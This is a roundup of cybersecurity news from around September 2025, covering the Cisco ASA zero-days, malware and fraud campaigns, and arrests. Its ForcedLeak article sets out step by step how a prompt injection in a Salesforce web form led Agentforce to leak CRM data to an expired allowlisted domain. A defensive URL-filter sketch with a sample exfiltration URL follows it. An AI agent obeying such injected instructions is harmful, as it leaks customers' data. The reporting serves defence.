2025-09-26 AI Startup News
Urgent: Cisco ASA Zero-Day Duo Under Attack; CISA Triggers Emergency Mitigation Directive
Cisco is urging customers to patch two security flaws impacting the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software, which it said have been exploited in the wild.

The zero-day vulnerabilities in question are listed below:

- CVE-2025-20333 (CVSS score: 9.9) - An improper validation of user-supplied input in HTTP(S) requests vulnerability that could allow an authenticated, remote attacker with valid VPN user credentials to execute arbitrary code as root on an affected device by sending crafted HTTP requests
- CVE-2025-20362 (CVSS score: 6.5) - An improper validation of user-supplied input in HTTP(S) requests vulnerability that could allow an unauthenticated, remote attacker to access restricted URL endpoints without authentication by sending crafted HTTP requests

Cisco said it’s aware of “attempted exploitation” of both vulnerabilities, but did not reveal who may be behind it, or how widespread the attacks are. It’s suspected that the two vulnerabilities are being chained to bypass authentication and execute malicious code on susceptible appliances.

It also credited the Australian Signals Directorate, Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security, U.K. National Cyber Security Centre (NCSC), and U.S. Cybersecurity and Infrastructure Security Agency (CISA) for supporting the investigation.

CISA Issues Emergency Directive ED 25-03

In a separate alert, CISA said it’s issuing an emergency directive urging federal agencies to identify, analyze, and mitigate potential compromises with immediate effect. In addition, both vulnerabilities have been added to the Known Exploited Vulnerabilities (KEV) catalog, giving the agencies 24 hours to apply the necessary mitigations.

“CISA is aware of an ongoing exploitation campaign by an advanced threat actor targeting Cisco Adaptive Security Appliances (ASA),” the agency noted. “The campaign is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution on ASAs, as well as manipulating read-only memory (ROM) to persist through reboot and system upgrade. This activity presents a significant risk to victim networks.”

The agency also noted that the activity is linked to a threat cluster dubbed ArcaneDoor, which was previously identified as targeting perimeter network devices from several vendors, including Cisco, to deliver malware families like Line Runner and Line Dancer. The activity was attributed to a threat actor dubbed UAT4356 (aka Storm-1849).

“This threat actor has demonstrated a capability to successfully modify ASA ROM at least as early as 2024,” CISA added. “These zero-day vulnerabilities in the Cisco ASA platform are also present in specific versions of Cisco Firepower. Firepower appliances’ Secure Boot would detect the identified manipulation of the ROM.”
Threatsday Bulletin: Rootkit Patch, Federal Breach, OnePlus SMS Leak, TikTok Scandal & More
Welcome to this week’s Threatsday Bulletin—your Thursday check-in on the latest twists and turns in cybersecurity and hacking. The digital threat landscape never stands still. One week it’s a critical zero-day, the next it’s a wave of phishing lures or a state-backed disinformation push. Each headline is a reminder that the rules keep changing and that defenders—whether you’re protecting a global enterprise or your own personal data—need to keep moving just as fast.

In this edition we unpack fresh exploits, high-profile arrests, and the newest tactics cybercriminals are testing right now. Grab a coffee, take five minutes, and get the key insights that help you stay a step ahead of the next breach.

Firmware fights back
SonicWall Releases SMA 100 Firmware Update to Remove Rootkit

SonicWall has released a firmware update that it said will help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices. “SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices,” the company said. “SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version.” The update comes after a report from Google that found a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices. SonicWall has also disclosed that it is expediting the end-of-support (EoS) date for all SMA 100 devices to October 31, 2025, citing “significant vulnerabilities presented by legacy VPN appliances.”

Texts laid bare
Unpatched Flaw in OnePlus Phones Lets Malicious Apps Access Text Messages

A permission bypass vulnerability (CVE-2025-10184, CVSS score: 8.2) has been discovered in multiple versions of OnePlus OxygenOS installed on its Android devices. The shortcoming has to do with the fact that sensitive internal content providers are accessible without permission, and are vulnerable to SQL injection. “When leveraged, the vulnerability allows any application installed on the device to read SMS/MMS data and metadata from the system-provided Telephony provider (the package com.android.providers.telephony) without permission, user interaction, or consent,” Rapid7 said.
“The user is also not notified that SMS data is being accessed.” Successful exploitation of the flaw could lead to the theft of sensitive information, such as multi-factor authentication (MFA) codes sent as SMS messages. The issue appears to have been introduced as part of OxygenOS 12, released in 2021. The vulnerability remains unpatched as of writing, but OnePlus has acknowledged it’s investigating the issue.

GeoServer hole exploited
CISA says Hackers Breached Federal Agency Using GeoServer Exploit

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a comprehensive cybersecurity advisory detailing how threat actors successfully compromised a U.S. federal civilian executive branch agency’s network on July 11, 2024, by exploiting CVE-2024-36401, a critical remote code execution vulnerability in GeoServer.
“Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers,” the agency said. Once compromised, the attackers uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living-off-the-land (LotL) techniques for user, service, filesystem, and network discovery, while relying on tools like fscan, dirtycow, and RingQ for network reconnaissance, privilege escalation, and defense evasion, respectively.

SIM-swapping secrets spill
Confessions of Scattered Spider’s Noah Urban

Last week, three members of the notorious cybercrime group Scattered Spider were arrested. The arrests came close on the heels of the crew announcing that it was shuttering its operations. The group, composed primarily of English-speaking teenagers, is known to carry out hacking sprees using advanced social engineering tactics to breach high-profile companies, steal data, and extort them.

Earlier this year, Noah Urban, a 20-year-old linked to the notorious group, pled guilty to his cybercrime charges and agreed to pay millions in restitution. In a report published last week, Bloomberg revealed his critical role as a caller, talking people into unwittingly giving them access to sensitive computer systems by installing remote access tools. He also said he found a SIM-swapping group through Minecraft, the leader of which paid him $50 each time a call resulted in a cryptocurrency theft.

Urban also said one of the collaborators, Daniel Junk, figured out a way to access T-Mobile’s customer service portal by registering his personal computer to its corporate network and using remote access software to get into the company’s SIM activation tool. Junk is said to have paid Urban to call T-Mobile stores and deceive staff into handing over their logins by claiming to be from the internal security management.

Soon Urban graduated to employing his own callers to conduct SIM swapping and used fake Okta login pages to trick a Twilio employee into sending their credentials. But when that account didn’t have the data he wanted, he logged into the employee’s Slack account and messaged a senior employee he’d identified on LinkedIn, asking them to send customer data belonging to 209 companies for auditing purposes. The information was subsequently used to hack more companies. In December 2022, the group also stole the personal information of 5.7 million customers of Gemini Trust and put it up for sale.

This activity cluster came to be known as 0ktapus. The threat group would eventually join hands with other entities like LAPSUS$ and Scattered Spider to breach Crypto.com and exploit a United Parcel Service Inc. system to gather the personal data of would-be victims. Urban’s home was raided by U.S. authorities in March 2023, and he was eventually arrested in January 2024. Last month, he was sentenced to ten years in prison. “I’m not saying what I did was a good thing, it’s a horrible community, and what I did was bad,” he told Bloomberg. “But I loved my life. I like who I am. I’m glad I was able to live life as I lived it.”

Stealthy SVG stings
Oversized SVG Files Used to Deliver AsyncRAT

Threat actors are using booby-trapped SVG files in an email phishing campaign targeting users in Colombia, Mexico, and Peru as a delivery vector to stealthily deliver malware like AsyncRAT by means of a password-protected ZIP archive. The oversized SVG files contain the “full package,” eliminating the need for external connections to a remote server in order to send commands to compromised devices or download additional malicious payloads. “Attackers also appear to rely at least partly on artificial intelligence (AI) tools to help them generate customized files for every target,” ESET said. “The ability of SVG lures to carry scripts, embedded links and interactive elements makes them ripe for abuse, all while increasing the odds of evading detection by some traditional security tools.”

Right-to-left ruse
BiDi Swap Leads to URL Spoofing

A decade-old vulnerability can open the door to URL spoofing by exploiting how browsers handle Right-to-Left (RTL) and Left-to-Right (LTR) scripts, thereby allowing attackers to craft URLs that appear trustworthy but actually lead to a different destination.
The attack has been codenamed BiDi Swap by Varonis. While punycode homograph attacks and RTL override (RLO) exploits have long been abused to deceive users and browsers into displaying deceptive text or URLs, BiDi Swap entails crafting domains that have an LTR subdomain with some RTL parameters to spoof legitimate sites.

Self-replicating supply-chain menace
CISA Releases Alert on Shai-Hulud Attack

CISA has published an advisory on the recent widespread supply chain compromise targeting the npm ecosystem that involved the use of a self-replicating worm named Shai-Hulud to steal credentials and propagate the malware to other packages. The malware “leveraged an automated process to rapidly spread by authenticating to the npm registry as the compromised developer, injecting code into other packages, and publishing compromised versions to the registry,” CISA said. The agency is urging organizations to conduct a dependency review, pin npm package dependency versions to known safe releases, rotate all developer credentials, mandate phishing-resistant multi-factor authentication (MFA) on all developer accounts, monitor for anomalous network behavior, harden GitHub security by removing unnecessary GitHub Apps and OAuth applications, and enable branch protection rules. “The Shai-Hulud worm represents a significant escalation in the ongoing series of NPM attacks targeting the open-source community,” Palo Alto Networks Unit 42 said. “Its self-replicating design is particularly notable, effectively combining credential harvesting with an automated dissemination mechanism that exploits maintainers’ existing publishing rights to proliferate across the ecosystem.”

Game patch turns thief
BlockBlasters Game Delivers StealC Malware

A 2D platformer game called BlockBlasters has begun to exhibit signs of malicious activity after a patch release on August 30, 2025, that silently captures system information, a list of installed security products, and cryptocurrency wallet browser extensions, and drops the StealC information stealer while the user is playing the game. This patch affects hundreds of players who currently have the game installed on their systems, G DATA said. The game has since been pulled from Steam.

Database door unlocked
Exposed Oracle DBS Server Used to Drop Elons Ransomware

Threat actors have been observed exploiting an exposed Oracle DBS database server to execute commands remotely and create an encrypted tunnel with a command-and-control (C2) server to ultimately deploy Elons, a likely variant of the Proxima/Blackshadow ransomware that appeared in early 2024. It’s suspected that the attackers used an encrypted tunnel with a C2 server for network communication, Yarix said.

Remote tool turned spy
Malicious ScreenConnect Installers Deliver AsyncRAT

Trojanized ScreenConnect installers are being used to distribute AsyncRAT and a custom PowerShell RAT as part of an ongoing campaign designed to facilitate data theft and long-term access.
An analysis of the various IP addresses associated with AsyncRAT activity has revealed a “resilient, evasive AsyncRAT malicious infrastructure maintained for long-term operations rather than opportunistic attacks,” Hunt.io said.

Basic ransomware, big chaos
West Sussex Man Arrested in Connection with Cyber Attack Affecting Airports

A man in his forties from West Sussex has been arrested in connection with a cyber attack that disrupted day-to-day operations at several European airports including Heathrow. The U.K. National Crime Agency (NCA) said he has been released on conditional bail. “Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing,” Deputy Director Paul Foster, head of the NCA’s National Cyber Crime Unit, said. The agency did not name the suspect or say whether he acted alone or as part of a wider cybercriminal group. The incident caused hundreds of flight delays after Collins Aerospace baggage and check-in software used by several airlines failed. RTX Corporation, the owner of Collins Aerospace, said ransomware had been deployed in the attack. Although the company did not share any other details regarding the incident, cybersecurity researcher Kevin Beaumont said the attackers used an “incredibly basic” ransomware variant called HardBit.

Fake mirrors hook devs
PyPI Warns About Continued Phishing Attacks

The maintainers of the Python Package Index (PyPI) have warned of continued phishing attacks that employ domain-confusion and legitimate-looking emails to trick account holders into parting with their credentials. Recipients are urged to click on fake links (“pypi-mirror.org”) under the pretext of verifying their email address for “account maintenance and security procedures” or risk getting their accounts suspended. Package maintainers are advised to change their passwords with immediate effect if they have already clicked on the link and provided their login information. It’s also advised to check the account’s Security History for any suspicious activity.

French dark market falls
France Seizes Dark French Anti System

Law enforcement authorities in France have shut down a dark web marketplace catering to French-speaking users. The Dark French Anti System, or DFAS, was established in 2017 and had more than 12,000 registered users, emerging as a major hub for peddling drugs, arms, hacking tools, money-laundering schemes, and other criminal services. Authorities took control of servers and arrested two suspects, one who is alleged to be the site’s chief administrator and an accomplice who helped in the testing of its services.

Global sting hauls millions
INTERPOL Announces $439 million Recovery

An INTERPOL-coordinated operation spanning 40 countries and territories led to the recovery of USD 342 million in government-backed currencies, along with USD 97 million in physical and virtual assets. The operation, dubbed HAECHI-VI, took place between April and August 2025, and targeted seven types of cyber-enabled financial crimes: voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise and e-commerce fraud. As part of the ongoing effort, authorities blocked over 68,000 associated bank accounts, froze close to 400 cryptocurrency wallets, and recovered around $16 million in suspected illicit profits from cryptocurrency wallets.

In addition, Portuguese law enforcement broke up a syndicate that diverted funds meant to support vulnerable families, leading to the arrest of 45 suspects who illegally accessed social security accounts and altered bank details that resulted in $270,000 stolen from 531 victims. Thai officials also seized $6.6 million in stolen assets in connection with a sophisticated business email compromise scam conducted by a transnational organized crime group comprising Thai and West African nationals. “The gang deceived a major Japanese corporation into transferring funds to a fictitious business partner based in Bangkok,” INTERPOL said.

Kids’ data under spotlight
TikTok Comes Under Scrutiny in Canada for Collecting Children Data

The popular social media app TikTok has been collecting sensitive information from hundreds of thousands of Canadians under 13 years old, according to a joint investigation by privacy authorities. However, “as a result of TikTok’s inadequate age-assurance measures, the company collected the personal information of a large number of Canadian children, including information that the offices consider to be sensitive,” the report said. The probe also found TikTok failed to adequately explain its collection and use of biometric information, such as facial and voice data, for video, image and audio analysis.
The privacy commissioners said TikTok agreed to enhance its age verification and provide up-front notices about its wide-ranging collection of data. The company also agreed to “effectively stop” allowing advertisers to target users under the age of 18, except based on broad categories such as language and approximate location.

AI turbocharges vulnerabilities
AI Coding Assistants Ship With More Risks

A new report from Apiiro has found that software development teams using artificial intelligence (AI)-powered coding assistants have introduced “over 10,000 new security findings per month across repositories,” a 10× spike from December 2024. “These flaws span every category of application risk — from open-source dependencies to insecure coding patterns, exposed secrets, and cloud misconfigurations,” Apiiro said. “AI is multiplying not one kind of vulnerability, but all of them at once.” The study also found that while syntax errors in AI-written code dropped by 76% and logic bugs declined by more than 60%, privilege escalation paths jumped 322%, and architectural design flaws increased 153%. In addition, AI-assisted developers exposed cloud-related API keys and service principals nearly twice as often as their non-AI peers.

Shortcut to bypass security
LNK Stomping Detailed

In September 2024, Microsoft issued patches for a Windows Mark-of-the-Web (MotW) security feature bypass vulnerability tracked as CVE-2024-38217. Also called LNK Stomping, the flaw exploits the manner in which Windows shortcut (LNK) files are handled to remove the MotW tag and bypass security protections. According to Elastic, there are indications that the issue has been exploited as far back as February 2018, long before it was publicly documented. “LNK Stomping is an attack that manipulates the actual execution program path of a Windows shortcut file (.lnk) with an abnormal target path or internal structure,” South Korean cybersecurity company ASEC said. “It then prompts explorer.exe to remove the MoTW metadata during the ‘normalization (Canonicalization)’ process, thereby bypassing security checks.”

BankBot strikes Southeast Asia
Indonesian and Vietnamese Android Users Targeted by Banking Trojans

DomainTools revealed that Indonesian and Vietnamese Android users have been targeted by banking trojans disguised as legitimate payment and government identity applications since August 2024. “The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia’s daytime hours,” the company said.
It’s suspected that the threat actors are using spoofed websites imitating the Google Play Store to trick users into installing fraudulent APK files that drop a banking trojan named BankBot, which had its source code leaked on Russian-language forums in 2016. Over 100 domains have been identified as being used for malware distribution.

Russian influence playbook
New Disinformation Campaign Targeting 2025 Moldovan Elections

A state-backed threat actor with ties to Russia is targeting the upcoming 2025 Moldovan elections with a disinformation campaign, setting up fake news sites to publish articles that amplify narratives attempting to dissuade Moldova from further aligning with the European Union and exhibit bias against the current leadership. The multi-year activity is tracked under the name Storm-1679 (aka Matryoshka). Silent Push said it identified “technical fingerprints” linking the efforts to a Russian news site named Absatz. It also found commonalities between multiple disinformation websites, suggesting “infrastructure reuse and common ownership across this campaign.” This includes the use of two IP addresses – 95.181.226[.]135 and 91.218.228[.]51 – which have been used to host domains in connection with a Russian disinformation effort dating back to 2022. “When searching for the Russian word for Moldova (‘Молдова’) on Absatz (absatz[.]media/search), there are dozens of clear disinformation articles,” Silent Push said.

Sabotage by algorithm
DeepSeek Produces Less Secure Code for Groups China Disfavors

In new research published by CrowdStrike, it has been found that Chinese artificial intelligence engine DeepSeek often either refuses to help programmers or gives them low-quality code or code containing major security flaws when they say they are working for the banned spiritual movement Falun Gong or other groups considered sensitive by the Chinese government. “Deliberately producing flawed code can be less noticeable than inserting back doors – secret means of access for unauthorized users, including governments — while producing the same result: making targets easy to hack,” The Washington Post reported.

That wraps up this week’s Threatsday Bulletin. Use these stories as a prompt to double-check your own defenses: apply the urgent updates, tighten access controls, and talk with colleagues about what these incidents mean for your environment. Every small action today helps prevent a big incident tomorrow.
Vane Viper Generates 1 Trillion DNS Queries to Power Global Malware and Ad Fraud Network
The threat actor known as Vane Viper has been outed as a purveyor of malicious ad technology (adtech), while relying on a tangled web of shell companies and opaque ownership structures to deliberately evade responsibility.

“Vane Viper has provided core infrastructure in widespread malvertising, ad fraud, and cyberthreat proliferation for at least a decade,” Infoblox said in a technical report published last week in collaboration with Guardio and Confiant. “Vane Viper not only brokers traffic for malware droppers and phishers, but appears to run their own campaigns, consistent with previously documented ad-fraud techniques.”

Vane Viper, also called Omnatuor, was previously documented by the DNS threat intelligence firm in August 2022, which described it as a malvertising network akin to VexTrio Viper that takes advantage of vulnerable WordPress sites to build a massive network of compromised domains and use them to spread riskware, spyware, and adware.

One of the notable aspects of the threat actor’s persistence techniques is the abuse of push notification permissions to serve ads even after the user navigates away from the initial page by altering browser settings. This approach relies on service workers, which maintain a persistent headless browser process to listen for events and serve unwanted notifications.

Late last year, Guardio Labs laid bare a campaign dubbed DeceptionAds that was found to leverage Vane Viper’s malicious ad network to facilitate ClickFix-style social engineering campaigns. The activity was attributed to a company named Monetag, which, according to Infoblox, is a subsidiary of PropellerAds, a commercial ad technology company that, in turn, is a subsidiary of AdTech Holding, a holding company based in Cyprus.

Domains linked to PropellerAds have long been flagged for facilitating malvertising campaigns and driving traffic to exploit kits or other fraudulent sites. Further analysis has uncovered evidence suggesting that several ad-fraud campaigns have originated from infrastructure attributed to PropellerAds.

The cybersecurity company said Vane Viper has accounted for about 1 trillion DNS queries over the past year in about half of its customer networks, adding the threat actor takes advantage of hundreds of thousands of compromised websites and malicious ads that redirect unsuspecting site users to malicious browser extensions, fake shopping sites, adult content, survey scams, fake apps, sketchy software downloads, and malware, including an Android malware called Triada in one case.

What’s more, Vane Viper appears to share infrastructure and personnel ties with URL Solutions (aka Pananames), Webzilla, and XBT Holdings, with the former also linked to disinformation sites set up by a Russian influence operation called Doppelgänger. Some of the other companies owned by AdTech Holding include ProPushMe, Zeydoo, Notix, and Adex.

About 60,000 domains are assessed to be part of Vane Viper’s infrastructure, most of which only remain active for less than a month. However, there are a few domains that have been active for over 1,200 days, including the original omnatuor[.]com, propeller-tracking[.]com, and several others centered around push notification services.

The operation has been found to register vast numbers of new domains each month, reaching a high of 3,500 domains in the month of October 2024 alone, a significant jump from fewer than 500 domains registered in April 2023. Vane Viper domains make up nearly 50% of bulk-registered domains via URL Solutions since 2023, per the company.

PropellerAds, however, has previously denied any wrongdoing, stating it’s “nothing more than an automated intermediary to help advertisers find the best publishers to publish their advertisements,” and that it “does not endorse, support, or encourage any malicious advertisement on its network.”

“Vane Viper isn’t just a threat actor hiding behind an adtech platform,” Infoblox noted. “It’s a threat actor as an adtech platform. AdTech Holding claims to offer advertisers reach and monetization at scale, but what it actually delivers is risk.”

“Vane Viper hides behind the plausible deniability of operating as an advertising network, while using their TDS [traffic distribution system] to deliver multiple kinds of threats.”
Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection
Cybersecurity researchers have disclosed a critical flaw impacting Salesforce Agentforce , a platform for building artificial intelligence (AI) agents, that could allow attackers to potentially exfiltrate sensitive data from its customer relationship management (CRM) tool by means of an indirect prompt injection. The vulnerability has been codenamed ForcedLeak (CVSS score: 9.4) by Noma Security, which discovered and reported the problem on July 28, 2025. It impacts any organization using Salesforce Agentforce with the Web-to-Lead functionality enabled. “This vulnerability demonstrates how AI agents present a fundamentally different and expanded attack surface compared to traditional prompt-response systems,” Sasi Levi, security research lead at Noma, said in a report shared with The Hacker News.
One of the most severe threats facing generative artificial intelligence (GenAI) systems today is indirect prompt injection , which occurs when malicious instructions are inserted into external data sources accessed by the service, effectively causing it to generate otherwise prohibited content or take unintended actions. The attack path demonstrated by Noma is deceptively simple in that it coaxes the Description field in Web-to-Lead form to run malicious instructions by means of a prompt injection, allowing a threat actor to leak sensitive data and exfiltrate it to a Salesforce-related allowlisted domain that had expired and become available for purchase for as little as $5. This takes place over five steps - Attacker submits Web-to-Lead form with a malicious Description Internal employee processes lead using a standard AI query to process incoming leads Agentforce executes both legitimate and hidden instructions System queries CRM for sensitive lead information Transmit the data to the now attacker-controlled domain in the form of a PNG image “By exploiting weaknesses in context validation, overly permissive AI model behavior, and a Content Security Policy (CSP) bypass, attackers can create malicious Web-to-Lead submissions that execute unauthorized commands when processed by Agentforce,” Noma said. “The LLM, operating as a straightforward execution engine, lacked the ability to distinguish between legitimate data loaded into its context and malicious instructions that should only be executed from trusted sources, resulting in critical sensitive data leakage.” Salesforce has since re-secured the expired domain, rolled out patches that prevent output in Agentforce and Einstein AI agents from being sent to untrusted URLs by enforcing a URL allowlist mechanism.
“Our underlying services powering Agentforce will enforce the Trusted URL allowlist to ensure no malicious links are called or generated through potential prompt injection,” the company said in an alert issued earlier this month. “This provides a crucial defense-in-depth control against sensitive data escaping customer systems via external requests after a successful prompt injection.” Besides applying Salesforce’s recommended actions to enforce Trusted URLs, users are recommended to audit existing lead data for suspicious submissions containing unusual instructions, implement strict input validation to detect possible prompt injection, and sanitize data from untrusted sources. “The ForcedLeak vulnerability highlights the importance of proactive AI security and governance,” Levi said. “It serves as a strong reminder that even a low-cost discovery can prevent millions in potential breach damages.”
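The URL allowlist control described above, sketched as an added example (not Salesforce's or Noma's code): a filter that checks every URL in agent output against a host allowlist and also rejects an allowlisted host whose ownership has not been re-verified, which is the gap an expired domain leaves open. The hosts, dates, sample output and the names `TRUSTED_HOSTS`, `classify_url` and `sanitize_agent_output` are constructed assumptions.

```python
import re
from datetime import date
from urllib.parse import urlsplit

# Constructed allowlist (assumption): host -> date until which its ownership
# was last verified. An entry that outlives its registration is the weak spot.
TRUSTED_HOSTS = {
    "cdn.crm.example": date(2026, 1, 1),
    "legacy-assets.example": date(2024, 6, 30),  # registration lapsed, entry never removed
}

# Matches http(s) URLs in plain text, Markdown links/images and HTML attributes.
URL_RE = re.compile(r"https?://[^\s\"'<>)\]]+", re.IGNORECASE)


def classify_url(url, today):
    """Return (allowed, reason) for one URL found in agent output."""
    try:
        parts = urlsplit(url)
        # .hostname drops any "user@" prefix, so "trusted@evil" resolves to "evil".
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() != "https":
        return False, "scheme is not https"
    for trusted, verified_until in TRUSTED_HOSTS.items():
        # Match the exact host or a subdomain on a label boundary only.
        if host == trusted or host.endswith("." + trusted):
            if verified_until < today:
                return False, "allowlisted host not re-verified since " + verified_until.isoformat()
            return True, "allowlisted"
    return False, "host not on allowlist"


def sanitize_agent_output(text, today):
    """Replace every disallowed URL with a marker; return (clean_text, blocked)."""
    blocked = []

    def _replace(match):
        url = match.group(0)
        allowed, reason = classify_url(url, today)
        if allowed:
            return url
        blocked.append((url, reason))
        return "[blocked-url]"

    return URL_RE.sub(_replace, text), blocked


# Constructed agent output: one legitimate image, one image request carrying
# record data to the lapsed host, and two look-alike host tricks.
SAMPLE_OUTPUT = (
    "Lead summary for ACME.\n"
    "![logo](https://cdn.crm.example/logo.png)\n"
    "![status](https://legacy-assets.example/p.png?d=jane.doe%40corp.example)\n"
    "More: https://cdn.crm.example.evil.example/a.png and "
    "https://cdn.crm.example@evil.example/b.png\n"
)

if __name__ == "__main__":
    clean, blocked = sanitize_agent_output(SAMPLE_OUTPUT, date(2025, 9, 26))
    print(clean)
    for url, reason in blocked:
        print("BLOCKED", url, "->", reason)
```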
North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers
The North Korea-linked threat actors associated with the Contagious Interview campaign have been attributed to a previously undocumented backdoor called AkdoorTea, along with tools like TsunamiKit and Tropidoor. Slovak cybersecurity firm ESET, which is tracking the activity under the name DeceptiveDevelopment, said the campaign targets software developers across all operating systems, Windows, Linux, and macOS, particularly those involved in cryptocurrency and Web3 projects. It’s also referred to as DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi. “DeceptiveDevelopment’s toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET,” ESET researchers Peter Kálnai and Matěj Havránek said in a report shared with The Hacker News.
The campaign essentially involves the impersonated recruiters offering what appear to be lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List. After initial outreach, should the prospective target express interest in the opportunity, they are either asked to complete a video assessment by clicking on a link or a coding exercise. The programming assignment requires them to clone projects hosted on GitHub, which silently install malware. On the other hand, websites explicitly set up for undertaking the so-called video assessment display non-existent errors related to camera or microphone access being blocked, and urge them to follow ClickFix-style instructions to rectify the problem by either launching the command prompt or the Terminal app, depending on the operating system used.
Irrespective of the method employed, the attacks have been generally found to deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost (aka FlexibleFerret or WeaselStore), and PylangGhost. “WeaselStore’s functionality is quite similar to both BeaverTail and InvisibleFerret, with the main focus being exfiltration of sensitive data from browsers and cryptocurrency wallets,” ESET said. “Once the data has been exfiltrated, WeaselStore, unlike traditional infostealers, continues to communicate with its C&C [command-and-control] server, serving as a RAT capable of executing various commands.”
Also deployed as part of these infection sequences are TsunamiKit, PostNapTea, and Tropidoor, the first of which is a malware toolkit delivered by InvisibleFerret and is designed for information and cryptocurrency theft. The use of TsunamiKit was first discovered in November 2024.
The toolkit comprises several components, the starting point being the initial stage TsunamiLoader that triggers the execution of an injector (TsunamiInjector), which, in turn, drops TsunamiInstaller and TsunamiHardener. While TsunamiInstaller acts as a dropper for TsunamiClientInstaller, which then downloads and executes TsunamiClient, TsunamiHardener is responsible for setting up persistence for TsunamiClient, as well as configuring Microsoft Defender exclusions. TsunamiClient is the core module that incorporates a .NET spyware and drops cryptocurrency miners like XMRig and NBMiner. It’s believed that TsunamiKit is likely a modification of a dark web project rather than a native creation of the threat actor, given that samples related to the toolkit have been uncovered dating back to December 2021, predating the onset of Contagious Interview, which is believed to have commenced sometime in late 2022.
The BeaverTail stealer and downloader has also been found to act as a distribution vehicle for another malware known as Tropidoor that, according to ASEC, overlaps with a Lazarus Group tool called LightlessCan. ESET said it found evidence of Tropidoor artifacts uploaded to VirusTotal from Kenya, Colombia, and Canada, adding the malware also shares “large portions of code” with PostNapTea, a malware used by the threat actor against South Korean targets in 2022. PostNapTea supports commands for configuration updates, file manipulation and screen capturing, file system management, process management, and running custom versions of Windows commands like whoami, netstat, tracert, lookup, ipconfig, and systeminfo, among others, for improved stealth – a feature also present in LightlessCan. “Tropidoor is the most sophisticated payload yet linked to the DeceptiveDevelopment group, probably because it is based on malware developed by the more technically advanced threat actors under the Lazarus umbrella,” ESET said.
[Figure: Execution chain of WeaselStore]
The latest addition to the threat actor’s arsenal is a remote access trojan dubbed AkdoorTea that’s delivered by means of a Windows batch script. The script downloads a ZIP file (“nvidiaRelease.zip”) and executes a Visual Basic Script present in it, which then proceeds to launch BeaverTail and AkdoorTea payloads also contained in the archive. It’s worth pointing out that the campaign has leveraged NVIDIA-themed driver updates in the past as part of ClickFix attacks to address supposed camera or microphone issues when providing the video assessments, indicating that this approach is being used to propagate AkdoorTea. AkdoorTea gets its name from the fact that it shares commonalities with Akdoor, which is described as a variant of the NukeSped (aka Manuscrypt) implant – further reinforcing Contagious Interview’s connections to the larger Lazarus Group umbrella.
“DeceptiveDevelopment’s TTPs illustrate a more distributed, volume-driven model of its operations. Despite often lacking technical sophistication, the group compensates through scale and creative social engineering,” ESET said. “Its campaigns demonstrate a pragmatic approach, exploiting open-source tooling, reusing available dark web projects, adapting malware probably rented from other North Korea-aligned groups, and leveraging human vulnerabilities through fake job offers and interview platforms.”
Contagious Interview doesn’t operate in a silo, as it has also been found to share some level of overlap with Pyongyang’s fraudulent IT worker scheme (aka WageMole), with Zscaler noting that the intelligence gleaned from the former is used by North Korean actors to secure jobs at those companies using stolen identities and fabricating synthetic personas. The IT worker threat is believed to have been ongoing since 2017.
[Figure: Connection between Contagious Interview and WageMole]
Cybersecurity company Trellix, in a report published this week, said it uncovered an instance of a North Korean IT worker employment fraud targeting a U.S. healthcare company, where an individual using the name “Kyle Lankford” applied for a Principal Software Engineer position. While the job applicant did not raise any red flags during the early stages of the hiring process, Trellix said it was able to correlate their email addresses with known North Korea IT worker indicators. Further analysis of the email exchanges and background checks identified the candidate as a likely North Korean operative, it added.
“The activities of North Korean IT workers constitute a hybrid threat,” ESET noted. “This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime (or e-crime).”
CTEM’s Core: Prioritization and Validation
Despite a coordinated investment of time, effort, planning, and resources, even the most up-to-date cybersecurity systems continue to fail. Every day. Why? It’s not because security teams can’t see enough.
Quite the contrary. Every security tool spits out thousands of findings. Patch this. Block that.
Investigate this. It’s a tsunami of red dots that not even the most crackerjack team on earth could ever clear. And here’s the other uncomfortable truth: Most of it doesn’t matter. Fixing everything is impossible.
Trying to is a fool’s errand. Smart teams aren’t wasting precious time running down meaningless alerts. They understand that the hidden key to protecting their organization is knowing which exposures are actually putting the business at risk. That’s why Gartner introduced the concept of Continuous Threat Exposure Management and put prioritization and validation at the heart of it.
It’s not about more dashboards or prettier charts. It’s about narrowing focus and taking the fight to the handful of exposures that actually matter and proving your defenses will actually hold up when and where they really need to.
The Problem with Traditional Vulnerability Management
Vulnerability management was built on a simple premise: Find every weakness, rank it, then patch it. On paper, it sounds logical and systematic.
And there was a time when it made perfect sense. Today, however, facing an unprecedented and constant barrage of threats, it’s a treadmill not even the fittest team can keep up with. Each year, over 40,000 Common Vulnerabilities and Exposures (CVEs) hit the wire. Scoring systems like CVSS and EPSS dutifully stamp 61% of them as “critical.” That’s not prioritization, it’s panic at scale.
These labels don’t care if the bug is buried behind three layers of authentication, blocked by existing controls, or practically unexploitable in your specific environment. As far as they’re concerned, a threat is a threat.
Figure 1: Projected Vulnerability Volume
